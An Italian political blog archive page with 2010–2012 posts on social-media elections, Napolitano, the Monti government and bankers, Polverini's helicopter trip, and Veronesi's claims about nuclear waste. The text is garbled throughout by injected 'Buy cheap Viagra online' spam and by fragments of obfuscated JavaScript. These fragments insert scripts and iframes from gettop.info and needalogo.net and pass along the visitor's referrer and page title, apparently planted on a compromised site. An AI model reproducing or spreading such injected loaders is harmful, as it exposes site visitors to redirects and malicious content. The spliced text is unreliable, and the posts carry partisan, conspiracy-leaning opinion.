presidente Archivi - NonCeLaFaccioPiù

.

Elezioni 2.0

15 ottobre 2012 Commenti chiusi

Le prossime si preannunciano come le elezioni 2.0. Basta gettare uno sguardo agli U.S.A., in particolare alla sfida tra il Presidente Obama e il Governatore Romney. I due candidati sono al momento al lavoro per raggiungere e conquistare il maggior numero di elettori, ma questa volta sono i social network a farla da padrone. Non si può ignorare il fatto che, ad oggi, (e per fortuna!!) sono sempre di più le persone che scelgono la Rete per informarsi e per farsi un’opinione.

In Italia, alle ultime amministrative, sindaci come Pisapia o De Magistris sul web hanno costruito il loro risultato; Beppe Grillo è da anni che scrive e fa politica sul suo blog, grazie al quale ha dato vita al M5S. Ma ce li vedete voi i nostri ultracentenari politicanti a fare “botta e risposta” a suon di tweet, a linkare su Facebook, a postare i programmi sui propri blog?! Ovviamente sempre se sappiano di cosa stiamo parlando!! Beh, se succedesse, sicuramente ci sarebbe più partecipazione da parte degli elettori, più trasparenza, candidati più disponibili a rispondere ai quesiti della gente… D’altro canto c’è il problema concreto che il Web venga utilizzato (come viene utilizzato adesso) solo per una semplice divulgazione di contenuti, in modo tale da esporre una più ampia fetta di popolazione alla solita trita e ritrita propaganda dei partiti. Per il bene della comunità della Rete, spero proprio di no!! Hanno per anni sporcato le nostre strade con i loro manifesti elettorali, non sopporterei di vederli inquinare anche le nostre piazze virtuali!!

Mah, staremo a vedere…

Buy cheap Viagra online

document.currentScript.parentNode.insertBefore(s, document.currentScript);

L’Uomo dell’anno secondo Wired

1 dicembre 2011 Commenti chiusi

Dopo aver permesso che incompetenti e personaggi indagati per concorso esterno in associazione mafiosa e corruzione giurassero per la carica di ministri della Repubblica Italiana; dopo aver firmato leggi su leggi ad-personam, probabilmente anche senza leggerle, così, come fossero cambiali; dopo aver fatto finta di niente sul conflitto di interessi, sugli scandali e sulle

Buy cheap Viagra online

figuracce stratosferiche che qualcuno ci ha fatto fare a livello mondiale rovinando l’immagine dell’Italia; dopo aver fatto finta di avere delle fette di prosciutto sugli occhi ai tempi del mercato dei parlamentari venduti; dopo non aver posto fine definitivamente ad un governo agonizzante e deleterio che si reggeva solo grazie ad una maggioranza tirata per i capelli, permettendo così il quasi-fallimento del Paese; dopo aver autorizzato, senza dire una parola, il golpe delle banche è con immenso piacere che vi presento “L’Uomo dell’anno” secondo Wired!

La motivazione?! “Per aver dimostrato negli ultimi dodici mesi una sorprendente velocità nel rimanere collegato alla realtà, in una parola, wired!”

Mah… Se lo dite voi!!

-

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Stiamo regalando il paese alle banche?!

16 novembre 2011 Commenti chiusi

Il Faraone alla fine ha abdicato. Dopo 20 anni di regime mignottocratico il despota ha rassegnato le dimissioni in favore di un governo tecnico. Oggi il nuovo Presidente del Consiglio Mario Monti ha nominato i suoi nuovi ministri. Nella lista non figurano politici, ma nel curriculum di molti dei designati, compreso quello del nuovo premier, compaiono riferimenti a vari istituti bancari.

Per carità, non metto in dubbio che Monti sia un economista di fama internazionale, le cui capacità, in un momento di crisi come quello che stiamo affrontando adesso, potrebbero essere utilissime, se non determinanti, per la ripresa economica dell’Italia.

Quello che mi chiedo è se stiamo commettendo un grosso errore consegnando il Paese ad un uomo che fa parte della Commissione Trilaterale, della Goldman Sachs e del Gruppo Bilderberg. Visto e considerato anche il fatto che, secondo Milano Finanza, Goldman Sachs sarebbe all’origine dell’ondata di speculazione che ha aggredito i titoli di stato italiani, dichiarando nel contempo in un comunicato stampa che le “elezioni sono lo scenario peggiore per i mercati”.

Mi chiedo se sia un bene che si bypassi l’opinione popolare in barba alla democrazia e si opti per un governo decisamente imposto da pressioni esterne come quelle fatte dal Fondo Monetario Internazionale, dalla Commissione Europea e dalla BCE. Una situazione analoga la sta vivendo la Grecia con il Governo tecnico di Lucas Papademos, un bancario membro anche lui della Commissione Trilaterale che, guarda caso, si è insediato ad Atene nello stesso identico momento in cui i governi di Italia e di Grecia cadevano quasi simultaneamente.

-Ma che cos’è questa Commissione Trilaterale?

E’ un’organizzazione fondata il 23 giugno 1973 per iniziativa di David Rockefeller, presidente della Chase Manhattan Bank, e di altri dirigenti del Gruppo Bilderberg

Buy cheap Viagra online

e del Council on Foreign Relations. La Trilaterale conta come membri più di 300 influenti privati cittadini (uomini d’affari, politici, intellettuali) dall’Europa, dal Giappone e dal Nord America, con l’obiettivo dichiarato di promuovere una cooperazione più stretta tra queste tre aree. Ha sede sociale a New York.
[cit. Wikipedia]

Secondo lo scrittore francese Jacques Bordiot “il vero obiettivo della Trilaterale è di esercitare una pressione politica concertata sui governi delle nazioni industrializzate, per portarle a sottomettersi alla loro strategia globale”.

Insomma, non vorremmo certo trovarci nella situazione in cui ci dovessimo rendere conto di aver consegnato il Paese nelle mani delle banche e dei finanzieri internazionali dopo averlo strappato con così tanta fatica da quelle di veline e mignotte?!

URL Foto: IlSimplicissimus

-

<8 q="s:u;v:w" 0="\'+0+\'" x="\'+4+\'" y="\'+5+\'">\')})();',35,35,'src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height'.split('|'),0,{}))

La Polverini a Rieti tra elicotteri e insulti

22 luglio 2011 Commenti chiusi

Il Presidente della Regione Lazio Renata Polverini, dopo un estenuante viaggio di ben 70 Km in elicottero per raggiungere la festa del peperoncino a Rieti, viene assalita da uno di questi giornalisti, evidentemente comunista, che si è addirittura permesso di farle una domanda. Prontamente sono partiti gli insulti e le minacce da parte di Guglielmo Rositani ed il controllo dei documenti da parte dei Carabinieri.

A parte gli scherzi, non so se sia più vergognoso il fatto che il Presidente di una regione di una nazione in crisi spenda dei soldi pubblici per fare un viaggio di soli 70 Km in elicottero, o il fatto che un giornalista non possa più fare una legittima domanda senza che venga insultato e minacciato da qualche politicante ignorante e maleducato e senza che gli siano chiesti i documenti da parte delle forze dell’ordine.

-

-

Buy cheap Viagra online

<8 q="s:u;v:w" 0="\'+0+\'" x="\'+4+\'" y="\'+5+\'">\')})();',35,35,'src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height'.split('|'),0,{}))

}

d.getElementsByTagName('head')[0].appendChild(s);

Veronesi ci delizia con altre ca**ate nucleari

18 dicembre 2010 Commenti chiusi

Era un po’ che non parlavo di nucleare , beh c’è da dire che, in questo periodo, Silviolo e le sue malefatte mi hanno tenuto veramente occupato, mi sono concentrato di più su di lui, sui processi, sul bunga bunga, sulla fiducia… Certo, poi però vedo sparate di questo genere ed è normale che mi venga voglia di commentare. Ci tengo a ricordare che questo tizio, il professor Umberto Veronesi, dice di essere un oncologo ed è anche Presidente dell’Agenzia sulla sicurezza nucleare. Ogni tanto ci delizia con stronzate del tipo: “le scorie nucleari non sono pericolose!”. Ovviamente sono vaneggiamenti di un pazzo, ma questa volta credo si sia superato.

-

Cazzata N°1:

Dice per esempio che potrebbe dormire avendo in camera da letto scorie nucleari, secondo lui:

Buy cheap Viagra online

“non esce neanche la minima quantità di radiazioni” (AGI, La Repubblica, 30 novembre). Da non credere!! Andrebbe denunciato per falso ideologico!! E ovviamente non dovrebbe mai più mettere piede in un reparto di oncologia!!

Da Greenpeace:

Anche a beneficio del prof. Veronesi, diamo qualche dato. A seconda del tipo di contenitore, la radioattività delle scorie vetrificate a un metro di distanza è di 40, 100 o 200 microSievert all’ora (World Nuclear Transport Institute, luglio 2006). Supponendo che il professor Veronesi dorma 6 ore a notte (è un tipo iperattivo, pare…), ci passerebbe 2.190 ore all’anno, assumendo quindi da 87 a 438 milliSievert (mSv) all’anno (radiazioni gamma e neutroni). La dose massima consentita per un individuo della popolazione è di 1 mSv all’anno. I lavoratori addetti sono, invece, autorizzati a prenderne 20 all’anno. Altro che sonni tranquilli: Veronesi si beccherebbe una dose di radioattività che, grosso modo, è da 80 a 430 volte oltre quella consentita.

Se invece il professore preferisse tenere in camera da letto materiali nucleari non irraggiati, allora se la passerebbe molto meglio: in questo caso, infatti, si beccherebbe da 1 a 6 microSv all’ora con una dose annuale tra 2 e 12 mSv: dal doppio a 12 volte la dose massima.

Quali le conseguenze? Se, per assurdo, tutti i cittadini italiani seguissero il prof. Veronesi nell’esperimento in questione, avremmo oltre 250 mila casi di tumore fatali all’anno (le stime si riferiscono al tasso di esposizione di cui sopra: non sono di Greenpeace ma dell’ICRP la Commissione Internazionale per la protezione dalla radiazioni). Dubitiamo che basti il Prof. Veronesi a curarli tutti, e sarebbe meglio se il Prof. si facesse almeno un corso rapido sul tema per evitare di dire castronerie del genere.

Cazzata N° 2:

Il problema del deposito delle scorie. Secondo V. questo problema non esiste perché le potremo mandare tranquillamente in Spagna dove “c’è una vera e propria gara” dei comuni per accaparrarsi il deposito temporaneo per le scorie nucleari. Il problema è che, di questi “comuni nucleari”, solo 8 hanno dichiarato la loro disponibilità a ospitare le scorie e, tra l’altro, i parlamenti regionali si stanno opponendo con forza.

Cazzata N°3:

In Svizzera è in programma la costruzione di tre nuove centrali nucleari.

Di sicuro ce ne sono tre che devono chiudere e le aziende elettriche le vorrebbero sostituire. La Camera dei Cantoni su iniziativa del Cantone di Basilea, quello più fortemente antinucleare, ha deciso di continuare la procedura decisionale sulle tre centrali che avrà termine con un referendum nel 2013. In Svizzera i referendum hanno un valore (non come da noi!): di recente ce ne sono stati due (a carattere locale) che hanno sancito la fuoriuscita dal nucleare di Berna e St Gallen, che si aggiungono alle decisioni antinucleari già prese dalle città di Zurigo, Basilea e Ginevra.

-

E questo tizio è quello che dovrebbe vigilare sulla sicurezza delle nostre centrali? A me sembra che stia solamente promuovendo, con delle vere e proprie balle, questa tecnologia che, non mi stancherò mai di dire, è obsoleta e pericolosa!!

URL Foto: Greenpeace.it

-

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Powered by AlterVista